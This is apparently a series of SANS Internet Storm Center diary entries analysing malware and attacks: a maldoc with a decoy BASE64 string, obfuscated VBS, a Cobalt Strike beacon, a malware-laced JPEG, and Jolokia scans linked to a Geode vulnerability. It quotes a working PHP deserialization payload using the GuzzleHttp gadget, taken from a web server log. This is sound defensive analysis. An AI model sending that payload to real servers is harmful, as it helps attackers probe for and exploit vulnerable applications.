But there is one more thing: it contains a very long BASE64 string, 800,000+ characters, and it turns out to be a decoy.

The analysis doesn't take long, with oledump.py and the shellcode emulator scdbg.exe:

 

The stream with the shellcode is large (almost 1MB). And it contains a very long BASE64 string:

The decoded data has a very high entropy: 7.98... That's like random data.

To determine if the BASE64 string is part of the exploit or not, I did remove it and emulated the payload again.

So I cut out the first 0x6E0 bytes of the stream, e.g., without that BASE64 string, and I run the shellcode emulator on it:

I achieve exactly the same result: that BASE64 string is not necessary for the shellcode execution.

And it's not likely to be necessary for the downloaded EXE, as that is executed inside a new process, and the Excel process is killed at the end of the shellcode.

 

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

0 Comments

Published: 2022-09-08

Analyzing Obfuscated VBS with CyberChef

I took a closer look at this sample on MalwareBazaar, because it had no tags (now it has a VBS tag).

This time, I do the analysis with CyberChef.

I start by pasting a hexdump of the malicious file into CyberChef (produced with my tool zipdump.py):

And I use magic to identify the file:

It's UTF16 Little-Endian. And although CyberChef doesn't mention it, it has a Byte Order Marker (BOM): it starts with FF FE.

I decode the byte to UTF16LE and see a long list of line with : and ::

I filter these lines (: and ::) out with the filter command:

What remains is VBS code: I know this because of the dim and execute statements.

Dim is Visual Basic, thus VBS or VBA. But execute is VBS only.

Let's go through the code:

A lot of string obfuscation, with non-ascii characters.

I notice the following:

There's a small piece of code with a string of two unicode characters that seem to represent a house, followed by a string with uppercase letter A.

This could be an obfuscated search and replace operation.

Let's try that with CyberChef:

And indeed, we seem to get reversed BASE64 data (starting with ==).

Then I spot something else:

Let's do another search and replace, now for letter Z:

That does indeed look like reversed BASE64.

Let's extract and reverse it:

And now decode it:

That is a Powershell script, an encoded command: it needs to be decoded from UTF16:

If you are interested in the CuberChef recipe, you can find it here.

I was able to download the file, that analysis is for another diary entry.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

0 Comments

Published: 2022-09-07

PHP Deserialization Exploit attempt

I came across the following deserialization exploit attempt not in a honeypot but in the log for this (isc.sans.edu) webserver:

/!php/object+"O:24:\\"GuzzleHttp\\\\Psr7\\\\FnStream\\":2:{s:33:\\"\\0GuzzleHttp\\\\Psr7\\\\FnStream\\0methods\\";a:1:{s:5:\\"close\\";s:7:\\"phpinfo\\";}s:9:\\"_fn_close\\";s:7:\\"phpinfo\\";}"/recentdomains/,

People usually think about deserialization vulnerabilities in Java (and maybe .Net). But code written in any object-oriented language may be susceptible to deserialization vulnerabilities.

In some ways, the PHP example is even more "transparent" than some of the past Java examples I have seen. Deserialization vulnerabilities are a bit weird in that they just take advantage of a feature in how objects are instantiated. Software may exchange arbitrary objects serialized as a string. As the object is deserialized, its constructor is called, which may execute arbitrary code delivered with the object. Think about it as calling "eval" on the string received. [owasp]

This can be "ok", if only a limited set of objects are deserialized or if the object is received from a trusted source and properly digitally signed to avoid tampering with the object in transit. But the process quickly goes wrong if arbitrary objects are deserialized from arbitrary sources.

In this case, the attacker can find a "Gadget," which is an object that allows code execution, and feed it to the software using the "correct" parameters. In the case above, the gadget is "GuzzleHttp." There is nothing "wrong" with GuzzleHttp. GuzzleHttp is a PHP library used to create HTTP requests. Similar to the standard library "curl," it abstracts some lower-level features. GuzzleHttp is often installed as part of other packages (e.g. Laravel) if you use extensions that connect to HTTP APIs. So this is not a vulnerability in GuzzleHttp, but the attacker is looking for code that accepts GuzzleHttp objects and instantiates them (I do not think this is ever a good idea). [guzzle]

I am not sure what vulnerable software the exploit above looks for. But if attempts to execute phpinfo. This exploit will only flag vulnerable pages to come back and exploit later. Let me know if you can identify it (email jullrich\@/sans.edu). 

GuzzleHttp is a well-known gadget; you can find it listed in a GitHub repository of well-known gadget chains for various vulnerabilities. [gadgets]

[owasp] https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
[guzzle] https://docs.guzzlephp.org/en/stable/
[gadgets] https://github.com/ambionics/phpggc

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 Comments

Published: 2022-09-06

Analysis of an Encoded Cobalt Strike Beacon

I also created a video for this diary entry.

Someone reached out to me for the analysis of a Cobalt Strike beacon. This is the sample.

My tool 1768.py (a tool to analyse Cobalt Strike beacons) isn't able to find the configuration:

When something like this happens, I always try option -r. Option -r is raw mode: by default, 1768.py analyses the relevant sections of a PE file, but in raw mode, it takes a look at the complete file.

But this too doesn't work.

What you can do in a case like this, is execute the sample inside a sandbox, make a process memory dump of it, and then have 1768.py analyse the process memory dump. This often works for obfuscated/packed samples.

But first, I took a look at the PE file with my tool pecheck.py, to see if I could recognize anything that my tool didn't catch.

And there is an overlay (data appended to the end of the PE file). This overlay has a high entropy, and it's 256 KB and represents more than 90% of the total size of the PE file.

Let's take a look at the sections of the PE file to confirm this:

These are indeed all small sections, the largest is 10 KB. So that's too small to contain a stageless Cobalt Strike beacon, but the overlay is large enough.

Let's take a look at the overlay:

That doesn't ring a bell to me. But it seems that there is a repeating byte sequence at the end. Let's take a closer look:

Indeed: there is a repeating sequence of 18 bytes here (I highlighted 2 of them in red and green). This often happens when a PE file is XORed with a key: the end of a PE file is often a series of NUL bytes (0x00), and thus it reveals the XOR key.

I did recover the XOR key with trial-and-error, but I'm not going to explain this here (I do explain it in the video, about halfway). What I did do, is update my tool xor-kpa.py that I use to perform XOR known plaintext attacks. I added a definition for the encoded public key header found in a Cobalt Strike configuration: cs-key-dot.

Let's try that:

And indeed, a key was found, and it's very likely a good key, because 15 extra bytes where found. This means that a repetition of the key found 15 extra bytes matching the cs-key-dot signature.

I now use option -d to let xor-kpa.py decode the payload with the XOR key that was listed as last (thus with the highest probability of being correct), and I feed this output into 1768.py:

And now we have recovered the configuration.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

0 Comments

Published: 2022-09-05

Quickie: Grep & Tail -f With Notepad++

Notepad++ is a free and open source text editor for Windows.

You can simulate grep-like functionality with Notepad++ in 2 steps:

  1. Use find with a search pattern to bookmark all found lines
  2. Remove unmarked lines

Example:

A Windows event log as CSV file:

Start a search (Search / Find... or CTRL-F) and select the Mark tab:

Then do the following:

  1. clear all bookmarks, in case there are any left from previous operations
  2. type your search text (can be regex)
  3. toggle Bookmark line
  4. press Mark All button
  5. press Close button

After presing the Mark All button, you will see how many lines have been bookmarked:

Then go to Search / Bookmark / Remove Unmark Lines:

And you have you grep result:

If you to this with a file on disk that you don't want to modify, make sure not to save anything after the grep (or work on a copy).

It is also possible to do a "grep -v": select "Remove Bookmarked Lines".

 

Next tip: tail -f with Notepad++

When a text file is open, the Monitoring icon in the toolbar is enabled:

Press the button and the tab of the open text file will get a Monitoring icon:

From now on, lines appended to the file will appear automatically:

Notice that a monitored file can not be edited.

 

 

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

0 Comments

Published: 2022-09-04

Video: VBA Maldoc & UTF7 (APT-C-35)

I recorded a video for the maldoc analysis I did in diary entries "VBA Maldoc & UTF7 (APT-C-35)" and "Update: VBA Maldoc & UTF7 (APT-C-35)".

The analysis of shellcode is a bit different in the video, compared to the 2 diary entries I wrote. There's often more than one solution when doing maldoc analysis :-) .

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

0 Comments

Published: 2022-09-03

Video: James Webb JPEG With Malware

I recorded a video for yesterday's diary entry James Webb JPEG With Malware.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

0 Comments

Published: 2022-09-02

James Webb JPEG With Malware

On Wednesday's stormcast, Johannes talked about a JPEG picture (coming from the Jales Webb telescope) that malware authors had laced with malware.

I always like to take a look at such images with my analysis tools, like jpegdump.py.

This is the picture laced with malware.

When I run jpegdump.py on this picture, I get an overview of all the segments:

In a "normal" JPEG picture, you will find one Start Of Image (SOI) segment as the first segment in the file, and one End Of Image (EOI) segment as the last segment in the file.

Here we find 3 different SOIs and EOIs. Segments 1, 16 and 31 are SOI segments. anf Segments 15, 30 and 45 are EOI segments.

So there are 3 jpeg images in this file.

To check if these images are the same, I use option -E to display the hash of the data of each segment (I use MD5 for the demo here because it gives shorters strings than sha1 and sha256, and thus will not line wrap).

Notice that for the second and third JPEG image (between SOI and EOI), all the hash values are followed by parentheses and numbers.

Like for segment 17: md5=03fb38d57f72262e0160ee82f2e81b3e(2)

This means that the hash of the data of segment 17, is the same as the hash of the data of segment 2. Thus that the data is the same, if you don't fear md5 collisions (and if you do, just use sha256).

And that is the case for all segments of the second and third JPEG image. So what we have here, is a concatenation of 3 identical JPEG pictures.

Next, notice that the difference (d= value) of segment 16 is not 0.

This means that there is some data between segment 15 and segment 16. d=2320444 means that there are 2320444 bytes of data between EOI (segment 15) and SOI (segment 16).

We can select this data as follows: -s 16d (select the data between segment 15 and 16)

This looks like a certificate in ASCII. Let's dump it:

This is indeed a certificate. Notice that it starts with TV: that means that the data that was BASE64 encoded, starts with MZ. The magic header of a PE file.

A valid certificate should have letter M as first letter of the BASE64 data (and not T).

Let's decode this with base64dump.py (option -w ignores all whitespace):

And this is indeed a PE file.

Thus, what the malware authors did was equivalen to: copy /b webb.jpeg + malware.crt + webb.jpeg + webb.peg malware.jpeg

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

0 Comments

Published: 2022-09-01

Jolokia Scans: Possible Hunt for Vulnerable Apache Geode Servers (CVE-2022-37021)

On Tuesday, the Apache project released an update for Geode. The update patches a typical deserialization issue we often see in Java software like Geode (%%cve:2022-37021%%). Geode is a data management platform. It has to deal with a wide range of objects and formats. The simple allow listing approach usually doesn't work well in these environments.

But the vulnerability has a few dependencies:

  • You are only vulnerable if you are using Java 8. Java 8 is considered "on its way out," but it is still widely used. In particular, enterprise applications using Geode will often use Java 8 and are difficult to migrate.
  • JMX and RMI are used for the attack. These protocols are common in Java but are usually not directly exposed to the outside. You may remember RMI for its use in log4j exploits. An attacker would likely need to find a gateway to reach the Geode server via HTTP.

And here comes Jolokia. "JMX on Capsaicin," as it calls itself. It provides a simple HTTP to JMX gateway. So it is somewhat interesting that I also saw some scans for Jolkia starting yesterday.

The scans all arrive from %%ip:23.94.248.134%%. I saw the first requests arrive at around 12:30 pm UTC on Aug 30th, a couple of hours before the vulnerability was made public on Geode's website. I am not sure if it was made public via other channels earlier.

The IP address itself is "unremarkable." It is assigned to ColoCrossing. We got some logs from this IP from 2015 and 2016. It looks like a "random colocated server" that gets compromised ever so often. Shodan only shows port 53 open.

The scans target ports 80 and 8080, likely targets for a Jolokia setup. Two URLs are requested:

GET /actuator/jolokia/list HTTP/1.1
GET /jolokia/list HTTP/1.1

All requests use a specific User-Agent:

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0

My recommendation at this point:

  • First of all, make sure to patch Geode.
  • You may as well block that IP and User-Agent for the time being. It may not do much good in the long run, but it is simple enough.

The link between these scans and Geode is based on the timing of the scans. I do not have any actual exploit payloads right now. Time to figure out if it is worthwhile to set up a full Geode honeypot/VM.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 Comments